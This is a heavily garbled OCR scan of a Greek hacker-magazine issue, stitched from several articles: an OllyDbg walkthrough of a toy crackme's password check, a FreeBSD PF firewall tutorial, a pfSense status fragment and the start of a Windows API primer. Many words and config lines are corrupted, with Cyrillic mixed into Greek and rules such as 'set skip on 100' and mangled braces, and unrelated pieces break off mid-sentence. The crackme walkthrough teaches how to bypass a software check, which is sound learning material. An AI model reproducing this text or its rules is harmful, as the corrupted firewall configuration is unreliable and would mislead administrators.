D018FBS6| 76F4E0E3 RETURN to ntdll.76F4EGE3 from ntdll.F 
00138FES4| aaspirpa ASCII "ata=C:\ProgramData” 
9013FBS3 
9013FBSC 
т [9913F869 


[ [Paused _ 


-ποιο GAAo- TO "neraki". Av ra δύο strings εἶναι ἴδια εμφανίζεται To συγ- Εικόνα 5 
χαρητήριο μήνυμα, αλλιώς η nporporr| yia συνέχιση της προσπάθειας. H σκηνἠ αυτή 
έχει... ψωμ!! 


Δώστε βάση στο INZ (Jump if Not Zero). Πρόκειται yia µια εντολή διακλά- 
δωσης. Εν προκειμένω, αν ro επιθυμητὀὸ password δεν εἶναι ἰδιο р’ αυτὀ 
που δώσαμε, τότε η λειτουργικότητα του προγράµµατος θα oönyndgi στη 
διεύθυνση 00401056. An’ ó,ri βλέπουμε, εκεἰ τυπώνεται το μήνυμα ano- 
τυχἰας. Διαφορετικά το η λειτουργικότητα θα προχωρήσει κανονικἀ στην 
επόμενη εντολἠ (δηλαδἠ την 00401047), ὀπου εμφανίζεται το μήνυμα £ni- 
Tuxiac! 


Για ὁσους θέλουν να καταλάβουν βαθύτερα τι συνέβη εδώ, να πούμε От! 
στην πραγματικότητα η INZ εξετάζει την περίφημη Zero Flag (ВА. εικόνα 
4). Αυτή n onuaia (flag) γίνεται 9 ἡ 1, ανάλογα µε τ’ αποτέλεσµα κάποιου 
ελέγχου που έγινε σε προηγούμενη εντολἠ. Ας πάρουμε λοιπὸν τα npäy- 
рата λίγο ανάποδα (in reverse :). H προηγούµενη εντολἠ εἶναι η κλασικἡ 
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TEST EAX EAX. Εδὠ ελέγχεται O EAX register σε σχέση HE TOV εαυτὀ του. 
Θα πείτε, тора: Τι vònpa ἐχει αυτό; Χμ, yia την assembly ἐχει, διότι 
μετὰ ano ἑναν τέτοιον ἐλεγχο σετάρονται κάποιες βασικὲς σημαίες, ὁπως 
αυτή η Zero Flag. Αν λοιπὸν o EAX εἶναι O (FFFFFFFF στη δεκαεξαδικἠ του 
αναπαράσταση) τότε η Zero Flag θα εἶναι 1. Διαφορετικά θα εἶναι 0. Πώς 
όμως o EAX ἐγινε 0; Μπορούμε να πάμε ακόµα πιο πἰσω και να δούμε ὁτι ο 
πραγματικὸς ἐλεγχος ἐγινε στη γραμμὴ 


0040103B |. Ε8 40000000 CALL stupid.00401080 


Eo βλέπουμε οτι καλείται µια συνάρτηση, για την ακρίβεια αυτή που Kå- 
VEI τον ἐλεγχο ισότητας. Πρὀκειται yia τη συνάρτηση strcmp, την οποία 
και χρησιμοποιήσαμε στον ппүаіо κὠδικα του προγράµµατος. Αν θέλουμε 
να τη μελετήσουμε πρέπει να κάνουμε τον Olly va την ακολουθήσει EKEI, 
στη διεύθυνση 00401080. Па να то πετύχουμε, avri για [F8] θα πατήσουμε 
[F7]. Ουσιαστικά, µε το [F7] Аёнє στον 
Olly να οδηγηθεἰ “μέσα” στη ouvap- 
τηση που καλείται KI ὀχι va την npo- 
σπεράἆσει. Αυτή λοιπὀν η συνάρτηση 

εἶναι που θέτει την τιμή στον EAX. 
Στην πραγματικότητα, θέτει στον KA- 
ταχωρητὴ ECX Tn διεύθυνση της μνήμης 
ὁπου βρἰσκεται ro string "neraki", στον 
καταχωρητή EDX Tn διεύθυνση της µνήµης 
ὁπου βρίσκεται To string "trelaras", συ- 
γκρίνει αυτά τα δύο και δίνει τ’ ano- 
τἐλεσμα στον καταχωρητή EAX. Av 
εἶναι іса τότε o EAX γίνεται ө, αλ- 
MOG γίνεται 1. Av nate ανάποδα 

TN Аоүкг που μόλις περιγράψαμε 
-στην πραγματικότητα εμεὶς την 
περιγράψαµε ανάποδα οπότε εσεἰς 
τελικἀ θα τη Seite Kavovika- θα Ka- 
ταλάβετε εὐκολα γιατὶ και πὼς λειτουρ- 
yei το JNE. Δηλαδή: Τρέχει η συνάρτηση ελέγχου 

των δύο strings, καταχωρεἰ τ’ αποτέλεσμα στον EAX, 

μετά εκτελεἰται TO TEST EAX EAX (κι ἐτσι OETAPETAI η 

Zero Flag) και, τέλος, εκτελείται Eva JNZ που ελέγχει την τιµή στης Zero 
flag για у’ αποφασίσει πού θα στείλει τη λειτουργικότητα του προγράμμα- 
τος. Να θυμάστε οτι σχεδὀν πάντα μετὰ ano Eva TEST EAX EAX ακολουθεἰ 
Eva JNE ñ Eva JE (Jump if Equal to zero). 


Μόλις ξύσαμε την κορυφὴ ενὸς nqyóBouvou που λέγεται Olly. Σ’ auto 
το άρθρο -αλλά και στα επόμενα που θ’ ακολουθήσουν-, апо τη μεριά 
μας μπορούμε (KI επιτρέπεται) να σας δείξουμε µόνο αυτὸ που φαίνεται, 
δηλαδή ro 10%. Το υπόλοιπο 90% που δεν φαίνεται θα το ανακαλύψετε 
μόνοι σας. Στο χέρι σας εἶναι va “φάτε” κάποιο πρὀγραμμα ñ ακόµα και... 
ола. O τίτλος-ερώτημα του άρθρου, λοιπὀν, θα συνεχίσει να παραμένει 
επἰκαιρος γι΄ apkeró καιρὸ ακόµα :D 


Happy Reversing with Olly! 


Όπως οκριβώς 
μοιραζόμαστε 
τον κὠδικά µας, 


> 


έτσι θέλουμε VO 
μοιραστούμε και 


— τις ιδέες uac! 

hack Mati λοιπόν να 
μοβ ια μην το κάνουμε 
πλησίον ΗΣΑΠ Αγ. Ελευθέριος από κοντά; 


Ebooks Python UnitedTransnation 
Unauthorized Hackathons 
Awmn  SoftworeFreedomDay 
OpenLibrary MozillaGreece 
Melissi Fedora Hackfests 
Arduino BookCrossing 
Hellug SysAdmin OpenGarden 
OpenData  Aeroponics руд 
CreativeCommons 


Μάθε περισσότερα για To hsgr, To Πρόγραμμα Εκδηλώσεων 
και πως μπορείς και εσύ να σωμμετέχεις: αρα 
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Ὅπως θα E€p_ete firewalls υπάρχουν πολλά και για όλα, πρακτικά, τα λει- 
τουργικἀ συστήματα. Τα Windows ΧΡ χρειάστηκε να φτάσουν στο Service 
Pack 2 πριν η Microsoft αναγνωρίσει την ανάγκη ενσωμάττωσης firewall 
στο βασικὀ λειτουργικὀ. Ευτυχώς, τα άλλα OSes διαθέτουν την αντἰστοι- 
xn δυνατότητα εδὠ και пара πολύ καιρό. Ας δούµε pepikà an’ αυτά. 


ο Το Linux διαθέτει το iptables 
ο To OpenBSD ἐχει το ΡΕ (Packet Filter) 
ο To NetBSD ἐρχεται µε To IPFilter 


ο To FreeBSD διαθέτει το PF (and ro OpenBSD), ro IPFW και το 
IPFilter (and To NetBSD). Nai, yia To FreeBSD υπάρχουν rpia δια- 
φορετικὰ firewalls! 


Eivai γενικἀ anodekTo oT! n BSD διανομή nou δίνει τη µεγαλύτερη ἐμφα- 
ση στην ασφάλεια εἶναι To OpenBSD. Όχι ἀδικα, λοιπὀν, το PF θεωρείται 
ως Eva ano ra πλέον ισχυρἀ firewalls nou μπορείτε να χρησιμοποιήσετε. 
Ισχυρὀ ὁμως δεν σημαίνει κατ’ ανάγκη δύσχρηστο. Όπως θα διαπιστώσε- 
τε μόλις αρχίσετε να καταλαβαίνετε μερικὲς βασικὲς έννοιες, δεν Oa 'XETE 
κανένα πρὀβλημα να δημιουργήσετε τους δικούς σας κανόνες yia To ΡΕ. 


Εικόνα 1 

Ένα μικρὀ σε κατανάλωση και μέγεθος μηχάνημα εἶναι ιδανικὀ για τη δηµιουργία firewall ή/και μικρού 
server. To εικονιζόµενο εἰν’ Eva μηχανάκι της εταιρίας Soekris, πλήρως συμβατό µε BSD και μ΄ αρκε- 
TEG κάρτες δικτύου, ικανό v” αναλάβει την προστασία του δικτύου σας. Δεν διαθέτει ἐξοδο VGA, dpa 
πρέπει να κάνετε εγκατάσταση µέσω serial terminal. Μιλάμε για εξαιρετικά ευχάριστο απὀγευµα! 


EE 


Εξίσου σηµαντικὀ εἶναι To OT! Oa KATAAAPAIVETE τι κάνουν, ὁταν μερικοὺς 
μήνες αργὀτερα roug ρἰξετε µια ματιὰ! 


Тора, επειδἠ εμείς εἰμαστε ολίγον τι FreeBSD τύποι (yiari να το κρύψω- 
μεν, ἀλλωστε;) θα σας δεἰξουµε το ΡΕ πάνω σε ша βασικἠ εγκατάσταση 
TOU FreeBSD. Ωστόσο αν θέλετε να δουλέψετε µε TO OpenBSD, παρακα- 
λούμε, γίνετε OI καλεσμένοι Hac! Κι eneid ἠδη ακούμε κάποιες φωνού- 
λες στο βάθος να διαμαρτύρονται πως δεν Exouv FreeBSD και δεν ξέρουν 
πῶς να το εγκαταστήσουν, σας λέμε ότι προκειμένου να κάνετε τη βασικὴ 


1. from the φρικαλέες-αποδόσεις-ξένων-εκφράσεων department. 
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Über fireualls, the BSD шац! 


ri 


εγκατάσταση μπορείτε πολὺ апла να χρησιμοποιήσετε τους ακόλουθους 
δύο οδηγούς 


http://deltahacker.gr/2011/09/07/freebsd-installation-part-1 
http://deltahacker.gr/2011/09/07/freebsd-installation-part-2 


Ау пал! θέλετε να ξεκινήσετε akópa nio γρήγορα, τότε δεἰτε NWG μπορείτε 
να χρησιμοποιήσετε то VM image nou σας ἐχουμε προετοιμάσει: 


http: //deltahacker. gr/2011/09/18/freebsd-virtualbox-image 


Γιατί PF firewall pe FreeBSD; 


Σε περίπτωση που δεν ἐχετε NEIOTEI ακόμα, μπορούμε va σας δώσουμε 
μερικὰ σοβαρὰ και ατράνταχτα επιχειρήματα. 


ο To ΡΕ χρησιμοποιείται σε γνωστούς routers του εμπορίου. Όχι, 
δεν εννοούμε το ҳасо-гоиѓегакі που βρίσκεται αυτή τη στιγμὴ στο 
раф! σας και μοιράζει Internet στους υπολογιστὲς σας (και στη μισή 
γειτονιὰ αν εἶστε απρὀσεκτος). 


e Θα 'XETETNV ευκαιρία να χρησιμοποιήσετε και να μάθετε FreeBSD, 
το οποίο εἰν’ êva σταθερὀ, αξιόπιστο και YEVIKG εξαιρετικὀ λειτουρ- 
γικὀ για χρήση server. Πάνω του θα χτίσετε σιγὰ olyä τον home 
server σας, ο οποίος θα παρέχει Eva соро χρήσιμες υπηρεσίες. 
Στην πραγματικότητα, βέβαια, ὁλη αυτή η ενθάρρυνση εἶναι η alx- 
μὴ του δόρατος µιας τεράστιας συνομωσίας yia va σας μετατρὲ- 
WOUHE σε BSD fanatics! (Στην αρχή Eva firewall, µετά Eva serverä- 
KI, ὑστερα Eva FreeBSD-based desktop, αργότερα Eva ολόκληρο 
data center στο υπὀγειὀ σας :D) 


ο Ακόμη KI av ro βασικὀ σας AEITOUPYIKO εἶναι Ta Windows KI έχετε 
Eva povo μηχάνημα (пёра an’ auró στο ρὀλο firewall/router) στο 
τοπικὀ σας ÖIKTUO, Oa αισθάνεστε полу καλύτερα γνωρίζοντας бт! 
το προστατεύει ἑνα firewall που Χρησιμοποιείται σε μερικούς απὀ 
τους μεγαλύτερους EEUNNPETNTEG του ηλιακού συστήματος. Μην 
ξεχνάτε ἄλλωστε KAI TO τρομερά σημαντικό geek factor: "Σπίτι ἐχω 
ΡΕ. Τι ἄλλα νέα;”. 


e То PF μπορεί το ἰδιο кала να προστατεύει Eva μηχάνημα (αυτό που 
TO εκτελεἰ, προφανώς) ἡ Eva ολόκληρο δίκτυο. Εἶναι θέμα απλὠν 
ρυθμίσεων. 


ο Τέλος ro ΡΕ, ὁπως κι όλα τα кала αποσμητικἁ χώρου, δεν KOUKOU- 
Лом απλὠς τους εισβολεὶς: τους εξαφανἰζει! Έτσι, θα γλυτώσετε 
μεταξὺ ἄλλων και τις αὐπνίες апо τον εφιάλτη που λέγαμε npon- 
γουμένως. Κάντε ὁμως кайт! για τα κουνούπια, AUTA δεν τα KAAU- 
πτει/εξαφανἰζει :5 


Δεν ἐχετε λοιπόν καμιὰ, ра εντελὠς καμία, δικαιολογία. Ξεκινήστε *ropa* 
TO FreeBSD σας, κάντε login ως root κι ελάτε να δούμε noc PUBHIZETAI το 
ΡΕ. It's time for some serious geeking out, baby! 


Χρήσιμες γενικὲς γνώσεις 


Μπορούμε εὐκολα να σκεφτούμε διαφορετικούς τρόπους για να προστα- 
τεύσουμε Eva υπολογιστή and ὑπουλες απὀπειρες επικοινωνίας. 


ο To λεγόμενο packet filtering γίνεται µε βάση τη διεύθυνση, то 
πρωτόκολλο και τη θύρα (port) στην οποία γίνεται απόπειρα eni- 
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κοινωνίας. Πα παράδειγμα, Eva μηχάνημα nou εκτελεὶ μόνο χρέη 
web server δεν ἐχει λόγο να δέχεται συνδέσεις UDP και τις TCP τις 
δέχεται μόνο апо τη θύρα 80. Μπορούμε фиска να εξετάσουμε και 
πολλὲς ἄλλες λεπτομέρειες ενὸς εισερχόμενου πακέτου, ὥστε va 
δούμε av τελικἀ θα περάσει ἡ θα απορριφθεί. 


ο Στα Windows, ἰσως ἐχετε δει От! μπορείτε va ρυθµἰσετε το firewall 
QOTE V' αφήνει συγκεκριμένες εφαρμογές να χουν πρὀσβαση στον 
ἑξω κόσμο. Στην περίπτωση ουσιαστικά έχουμε Eva application 
firewall. 


Na σημειώσουμε εδὠ OTI µια θύρα (port) μπορεἰ va εἰναι... 


ο ανοικτή (open), δηλαδή να δέχεται συνδέσεις апо rov EEW κόσμο 
και να υπάρχει капота εφαρµογή πίσω an’ αυτήν που να τη χρησι- 
ponosi. Па παράδειγµα, οι διακομιστές αλληλογραφίας εξ ορισμού 
χρησιμοποιούν τη θύρα 25. Στο μηχάνημα nou εκτελεἰ ἑναν TÈ- 
тоюу διακομιστή, η θύρα 25 εἶναι ανοικτἠ και δέχεται συνδέσεις. 


e κλειστή (closed), που σημαίνει бт! φαίνεται апо τον ἐξω κόσμο 
алла δεν υπάρχει κάποια εφαρµογἡ nou va εξυπηρετεἰται ano au- 
τήν. Όταν κάποιος στείλει δεδοµένα σε µια κλειστή θύρα παἰρνει 
την απάντηση oT! εἶναι κλειστή. AUTO όμως προδίδει ὁτι υπάρχει 
υπολογιστἠς στη συγκεκριμένη διεύθυνση! 


ο ανύπαρκτη (filtered ñ stealth) που σηµαίνει oT! ὀποιος npo- 
σπαθεἰ να δει αν υπάρχει υπολογιστής στέλνοντας δεδομένα στη 
συγκεκριμένη θύρα αλλά δεν λαμβάνει каша απάντηση, σαν να 
μην υπάρχει μηχάνημα. 


Θα ρυθµίσουµε ro firewall µας µε τέτοιο τρόπο WOTE ὀλες οι OÙ- 
pec nou δεν εξυπηρετούν υπηρεσὶες va συμπεριφέρονται σαν va 
μην υπάρχουν. Κοινώς To firewall θα σφυράἀει αδιάφορα προς ro 
ταβάνι, καθώς τα δεδοµένα nou θα φτάνουν о’ ὀλες τις GOXETEG 
θύρες θα πέφτουν στο πάτωμα (ñ θα καταλήγουν στο πουθενὰ, 
αν προτιμάτε τις υπαρξιακὲς μεταφορές). 


Το ΡΕ ἐχει Eva ακόμα σηµαντικὀ πλεονέκτημα: εἶναι stateful 
firewall. Με απλά λόγια, κρατάει σ΄ Eva nivaka την κατάσταση 
κάθε σύνδεσης του μηχανήματος κι ἐτσι εἶναι σε θέση να διαχω- 
ρίσει ποια πακέτα εἶναι τμήματα µιας νέα επικοινωνίας και noia 
ανήκουν σε κάποια που ἐχει Non εδραιωθεί. Έτσι, µπορεί v’ αφἠ- 
νει τα δεύτερα να περνάνε πιο γρήγορα, βελτιώνοντας σημαντικά 
την απὀδοση. 


Σε γενικὲς γραμμές, Eva firewall ὁπως το PF ρυθμίζεται µε τη 
βοήθεια £vóc συνόλου κανόνων, το αποκαλούμενο ruleset. Οι 
κανόνες ορἰζουν τα κριτήρια µε βάση ra onoia τα πακέτα γἰνο- 
ута! αποδεκτὰἁ ἡ απορρίπτονται. Εἶναι δυνατὸν va ρυθµἰσουμε то 
firewall µας va λειτουργεὶ p’ Evav ano τους παρακάτω τρόπους: 


e Na επιτρέπει о’ όλα τα πακέτα να περνάνε *єкт©с* ano 
AUTA που ταιριάζουν µε κἀποιον κανόνα του ruleset. AUTO 
ονομάζεται exclusive firewall. 


, 


ο Ν΄ anoppinte! όλα τα πακέτα nou λαμβάνει *ekróc* an 
AUTA nou ταιριάζουν µε κἀποιον κανόνα Tou ruleset. AUTO 
ονομάζεται inclusive firewall. 
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Σχεδὸν πάντα, auto nou θέλετε va δημιουργήσετε εἰν’ Eva inclusive 
firewall, καθὼς εἶναι πολύ nio ασφαλὲς. To τι ακριβώς θα κάνει ro firewall 
µε το πακέτο που ἐλαβε av *óev* ταιριάζει µε κανέναν κανόνα, ορίζεται 
ano το λεγόμενο firewall policy. To firewall policy περιέχει £vav προεπι- 
λεγμένο κανόνα, που στην περίπτωση Tou inclusive firewall απλώς апор- 
ρἰπτει το πακέτο. 


Το прото σας PF ruleset - policy κι επιλογὲς 


Πριν αρχίσουμε µε τη δηµιουργία του ruleset θα πρέπει να ξεκινήσουμε 
TO FreeBSD µας και να ενεργοποιήσουμε то ΡΕ, βάζοντας TIG παρακάτω 
γραμμές στο /еїс/гс.сопї: 


pf_enable="YES” 
pf rules="/etc/pf.conf" 


Av E0EIG θέλετε va ενεργοποιήσετε ro logging, προσθέστε και TIG akó- 
λουθες: 


pflog enable="YES" 
pflog logfile="/var/log/pflog" 
Ας ξεκινήσουμε να συντάσουµε το αρχείο ρυθμίσεων /etc/pf.conf: 
set block-policy drop 
scrub in all fragment reassemble 
block in log all 
block out log all 


Οι πρῶτοι κανόνες opiZouv To policy Tou firewall. Χωρίς άλλους 
κανόνες, TO συγκεκριµένο policy εμποδίζει την εἰσοδο και την 
ἐξοδο *0Awv* των πακέτων! To block-policy ορἰζει noc θα ana- 
ντάει To firewall στον αποστολέα που EOTEIAE το... μυστήριο па- 
KETO που δεν πέρασε. To drop σηµαίνει ότι апла *ögv* 0’ ana- 
ута. Εἰπαμε, δεν υπάρχει μηχάνημα! H επιλογἠ scrub Kavoviko- 
поті «διορθώνει, θα λἐγαμε- κάποια πακέτα, WOTE να µην υπάρ- 
χει каша αμφιβολία για τον αποστολέα ἡ rov προορισμὀ τους KI 
απορρίπτει πακέτα nou ¿xouv µη-έγκυρα flags. H προστασία µας 
αρχίζει ἠδη ano εδώ. 


To fragment reassemble (στην πραγματικότητα ενεργὀ ano npo- 
επιλογή) συναρμολογεὶ τα κομμάτια των IP πακέτων που ¿xouv 
υποστεί fragmentation *npiv* περάσουν ano ro firewall. ‘Eva 
fragment апо µόνο Tou δεν περιέχει συνήθως αρκετὲς πληρο- 
Φορίες yia να αποφασιστεί αν πρέπει να περάσει ἡ Ох! апо το ΡΕ. 
Συνεχίζουμε τις προσθήκες στο /etc/pf.conf: 


set skip on 100 


Προφανώς, δεν BEAOUHE ro firewall va επηρεάζει καθόλου τη λει- 
Toupylä του loopback interface. To loopback interface εἶναι To 
γνωστὸ µας 127.0.0.1, το δίκτυο του μηχανήματος HE TOV... εαυ- 
TÓ του. Τα πακέτα που δημιουργούνται στο loopback δεν φεύ- 
γουν NOTE апо το σύστημά µας και δεν EXE! vónpa να τα εξετάζει 
το firewall. Χάρη στον προηγούμενο κανόνα, κινούνται ελεύθε- 
ρα. Συνεχἰζουµε... 


antispoof for г1@ inet 
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ο μμ cá music, 
EE: music) 1: 
Bust (live) .np4 


ДОТНО αυ mesic] rm -rf foxininakouli/ 
Ш ЕТТТ juar lust ἮΝ, ΠΗ cd 
[12:581431[ποη|ο84ῃ 1:8 logout 


TreeliSb/andé4 (aquarius64.labl.local) (ttuu0) 


login: Limiting closed port RST response from 233 to 200 packets/sec 
| amm closed port EST response fro 262 to 200 packets/sec 


Εικόνα 2 
Δεχόμαστε επἰθεση! O FreeBSD server Tou σχολείου µε To rate limit του πυρήνα, στα- 
ματάει να στέλνει απαντήσεις σε πακέτα ICMP που κατευθύνονται σε κλειστὲς θύρες. O 


admin αλλάζει πλευρό και συνεχίζει τον ύπνο του. AIKAIOUTAI να τον απολαύσει. 
dl 


Προφανώς, στον προηγούμενο κανόνα θα πρέπει ν΄ αντικαταστήσετε TO 
ΓΙΟ µε το буора συσκευἠς της δικἠς σας κάρτας δικτύου! Το antispoof 
εἶναι µια προστασἰα που παρέχει το ΡΕ ενάντια σε επιθέσεις ὁπου ο KAKO- 
βουλος χρήστης αλλάζει την διεύθυνση αποστολέα στο IP πακέτο, ὥστε 
va µη φαίνεται апо πού προέρχεται (ἡ yia va φανεὶ ὁτι προέρχεται ano 
κάποιο ἄλλο μηχάνημα του εσωτερικού δικτύου). Βεβαιωθείτε OT! η κἀρ- 
τα δικτύου στην οποία ενεργοποιεῖτε το antispoof διαθέτει διεύθυνση IP, 
διαφορετικἁ KIVÖUVEUETE να κλειδωθεἰτε EEW апо το μηχάνημα σας! Av 
πρόκειται να ενεργοποιήσετε antispoof και διαθέτετε IPv6 διεύθυνση (ψι- 
λο-απίθανο για την ора), τότε αντικαταστἠστε τον προηγούμενο κανόνα 
HE TOV 


antispoof for г1@ inet6 


(Σ’ όλους τους κανόνες, ro inet συμβολίζει το IPv4 και To inet6 To IPV6.) 
Σίγουρα θα θέλετε να βάλετε και το 


antispoof for 100 inet 
αφού δεν υπάρχει περίπτωση να λάβετε πακέτο and την κανονικἠ карта 
δικτύου που να χει διεύθυνση αποστολέα ro 127.0.0.1! 
Κανόνες Filtering 


Ἐχοντας τελειώσει µε TO policy, μπορούμε тора να γράψουμε τους ка- 
VOVEG που αφορούν στο φιλτράρισμα των πακέτων. Στο inclusive firewall 
ὁπως TO δικὀ µας, oi κανόνες θα ξεκινάνε µε τη λέξη (action) pass. AUTO 
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συμβαίνει επειδἠ ön ro policy μπλοκάρει ra πάντα και OI κανόνες µας 
εἶναι αυτοί nou επιλεκτικἀ Ө’ αφήνουν κἀποια πακέτα να περνάνε. =’ Eva 
exclusive firewall οι κανόνες µας θα ξεκινούσαν р ro block. Ας δούμε Eva 
παράδειγμα: 


pass in quick proto icmp all 
pass out quick proto icmp all 


Οι κανόνες αυτοί επιτρέπουν σε όλα Ta ICMP πακέτα να εισέρχονται και va 
EEEPXOVTAI and το σύστημα µας. Ίσως σκἐφτεστε OT! δεν εἶναι калд ιδέα 
(επίθεση flood µε ICMP πακέτα, Kaveic;) ὅμως ο πυρήνας rou FreeBSD 
διαθέτει μηχανισμό ICMP rate limiting ἐτσι κι αλλιώς. (Σας προλάβαμε!) 
Γενικά, Ta ICMP πακέτα εἶναι χρήσιμα για τη λειτουργία του δικτύου µας, 
οπότε επιτρέπουµε την ελεύθερη διακἰνησή τους. Προσέξτε От! οι δυο 
αυτοί κανόνες δεν ορίζουν οὐτε κάρτα δικτύου (interface) οὐτε διευθύν- 
σεις. Ара ισχύουν για όλα Ta interfaces και IP addresses rou μηχανήμα- 
τος. Στην πραγματικότητα, то all σημαίνει “апо οποιαδήποτε διεύθυνση 
σε οποιαδήποτε άλλη” και μπορεί επίσης να γραφτεί wc "from any to any”. 
H λέξη quick Exel επίσης Eva ξεχωριστὸ EVÖIAPEPOV: Σημαίνει От! αν то 
πακέτο που εξετάζεται περνάει an’ AUTO τον κανόνα, δεν χρειάζεται ν΄ 
αξιολογηθεἰ and τους επόμενους κανόνες και µπορεί να εξἐλθει апо το 
firewall προς τον προορισμὀ του. 


Ας υποθέσουμε тора ὁτι το συγκεκριµένο μηχάνημα χρησιμοποιείται για 
web browsing. Στην περίπτωση aurr| µας ενδιαφἑρει όταν ανοίγουμε τον 
Onolo browser να μπορούμε να επικοινωνούµε p’ опоо site θέλουμε. Eni- 
σης, µας ενδιαφἐρουν προφανώς και οι απαντήσεις που θα naipvoupe ano 
διάφορα web sites, οι οποίες πρέπει να περνάνε ano To firewall: 


pass out proto í tcp, udp } all keep state 


Με τον κανόνα αυτὸ μπορούμε va ξεκινήσουμε οποιαδήποτε επικοινωνία 
προς οποιαδήποτε διεύθυνση χρησιμοποιώντας πρωτόκολλα TCP rj UDP. 
To μυστικό εδώ εἶναι To keep state: Ενεργοποιούµε To stateful inspection 
του ΡΕ ὥστε κάθε απάντηση nou θα πάρουμε ως μέρος της σύνδεσης που 
ξεκινήσαμε Oa περάσει επἰσης ανεµπὀδιστα ano To firewall. Αν δεν unap- 
χει άλλος κανόνας και λάβουμε πακέτο που δεν ανήκει σε σύνδεση που 
ξεκινήσαμε εμεἰς, θα ισχύσει το policy block in all. 


Ἔστω тора ὅτι έχουμε EVA εσωτερικὀ δίκτυο µε διευθύνσεις της μορφής 
192.168.0.x (TO YVWOTO υποδίκτυο 192.168.0.0/24, πολύ συνηθισμένο σε 
μικρά εταιρικἁ και οικιακά δίκτυα). Θεωρώντας бт! το δίκτυο αυτό εἶναι 
ἐμπιστο (γιατί ἐχει μόνο FreeBSD μηχανήματα - Аёнє eueic, тора :D) uno- 
робин να χρησιμοποιήσουμε τον παρακάτω κανόνα WOTE τα δεδομένα να 
περνάνε γρήγορα ano το PF: 


pass in quick proto { tcp, udp } from 192.168.0.0/24 to 
192.168.0.0/24 keep state 


Πιστεύουμε ὁτι ο τρόπος λειτουργίας rou kavóva εἶναι προφανἠς. Τέλος, 
ας υποθέσουμε бт! TO μηχἀάνημάἁ µας ἐχει τη διεύθυνση 192.168.0.1 και 
θέλουμε να λειτουργεί ως Web server: 


pass in proto tcp from any to 192.168.0.1 port = 80 keep state 


To μόνο καινούριο εδὼ εἶναι то port. Θα μπορούσαμε επἰσης va χρησι- 
μοποιήσουμε "from any to any" av το μηχάνημα µας Exel πολλαπλὲς IP 
διευθύνσεις και θέλουμε о Web server va A&rroupysi σε’ όλες. Παρόμοια 
γράφουμε κανόνες και yia ἄλλες υπηρεσίες. Ως àoknon, βρεἰτε ποιες unn- 


Εικόνα 3 

Αν δεν θέλετε να 
εγκαταστήσετε 

και να ρυθμίσετε 
FreeBSD/PF απὀ 
μόνοι σας алла 
ψάχνετε για µια 
γρήγορη λύση που 
να βασίζεται στον 
ίδιο συνδυασμό 
λειτουργικού και 
firewall τότε µπο- 
paire να δοκιμάσετε 
το pfSense (www. 
pfsense.org), HE 
το πλήρες web 
interface. Εμείς 
πάντως προτιμάμε 
τις "χειροκίνητες” 
λύσεις: Πέρα απὀ 
τον σαφώς καλύτε- 
ро ἐλεγχο, η εκπαι- 
δευτική τους αξία 
εἶναι апла ἀπιαστη! 
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ρεσἰες επιτρέπονται µε τους παρακάτω κανόνες: 

pass in proto tcp from any Το any port = 22 keep state 

pass in proto tcp from any to any port = 25 keep state 


pass in proto tcp from any to any port = 110 keep state 


Evepyonoinon rou PF 


Έχοντας γράψει ro αρχείο /etc/pf.conf μπορούμε nÀšov va evepyonoir]- 
coupe To PF. Πολύ апла, ως root EKTEAEOTE: 


service pf start 


/etc/rc.d/pf start 
Αν ExETE ζητήσει και logging, τότε δώστε: 


service pflog start 


/etc/rc.d/pflog start 


To firewall ἐχει ενεργοποιηθεἰ. Μπορείτε va εξετάσετε τους κανόνες µε 
την εντολή: 


pfctl -s rules 


Μη ξαφνιαστεἰτε αν εἶναι λίγο διαφορετικοἰ απ’ αυτοὺς που γράψατε. To 
pfctl δείχνει τους κανόνες στην ανεπτυγμένη τους μορφή και με τις про- 
επιλογἐς τους, τις οποίες фиска δεν βάλαμε. 


Στο прото αυτό επεισόδιο του PF сас δείξαμε μόνο την επιφάνεια, µε 
τη βοήθεια απλὠν παραδειγμάτων. Στο επὀµενο τεύχος θα εξετάσουμε 
καλύτερα τη δομή του αρχείου κανόνων και θα δούμε noc μπορείτε va 
χρησιμοποιήσετε το ΡΕ yia ΝΑΤ και προστασία ενὸς ολόκληρου δικτύου. 
Μέχρι τότε, µπορείτε να περάσετε πολλά ευχάριστα απογεύματα µε επι- 
θέσεις στο σύστημα σας. 


Happy BSDing - και καλἠ τύχη H’ αυτές τις επιθέσεις ;) 
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Version. 122 
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Platform. pfSense 
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MBUF Usage 199/1545 
CPU usage — 0% 
Memory usage =. % 
SWAP usage % 
Disk usage ==, 
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Volume Manager rou Linux κι επιδεικνύεται η δημιουργία ενός LVM 
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Па ὁσους δεν το γνωρίζουν, σε YEVIKEG γραμμές ro Windows API 
(Application Programming Interface) εἰν’ Eva σύνολο ano EvTOAEG 
HE την μορφὴ συναρτήσεων, τις οποίες παρέχει n Microsoft στους 
προγραμματιστὲς προκειμένου va επεξεργάζονται δεδομένα nou 
μόνο TO λειτουργικὀ σύστημα έχει την αρμοδιότητα -KAI κατ΄ 
επέκταση ra δικαιώματα- va διαχειρἰζεται. Ενέργειες ὁπως το 
γράψιμο στο δίσκο, η προσπέλαση της μνήμης, η χρήση µιας 
συνάρτησης που βρίσκεται σε ша DLL (Dynamic Link Library) 
του λειτουργικού μπορούν να γίνουν µε χρήση συναρτήσεων 
που περιλαμβάνονται στο Windows API. Μάλιστα µέσα апо το 
API περνὰει κι ο μοναδικὸς δρόμος nou οδηγεἰ στον πολύ ana- 
γορευμένο και кала κρυμμένο Windows kernel, u^ ἄλλα Aóyia 
στην καρδιὰ του λειτουργικού. Εἶναι γνωστὀ oT! Ta Windows 
(Vista, 7 και λοιποί συγγενεὶς) χωρίζονται σε δύο επίπεδα λει- 
Toupyiac: Το πρώτο ονομάζεται User Mode και o’ αυτὀ ἐχουν npó- 
σβαση ὁλες οι διεργασίες που ξεκινούν (δηλαδἠ αρχικοποιούνται, 
initialized) and τους χρήστες, EVO) το δεύτερο επἰπεδο ονομάζεται 
Protected Mode κι EKEI δεν έχει πρόσβαση κανεὶς! Exp, εντάξει Ох! 
και κανείς ;) Στο Protected Mode ἐχουν πρόσβαση олс οι διερ- 
γασίες του User Mode, αλλά «μόνος μέσω πολύ συγκεκριμένων 
συναρτήσεων. Kai πού βρίσκονται αυτὲς oi συναρτήσεις; Μα, πού 
αλλού; Στο Windows API, το onoio ζει µέσα στο User Mode! (Ap- 
Χίζετε ropa να καταλαβαίνετε γιατὶ νοιαζόμαστε τόσο πολύ γι’ 
αυτὀ το API, έτσι δεν εἶναι;) 


Υπάρχουν δύο ειδών APIs: ro Base και то Native. H μαμὰ MS 
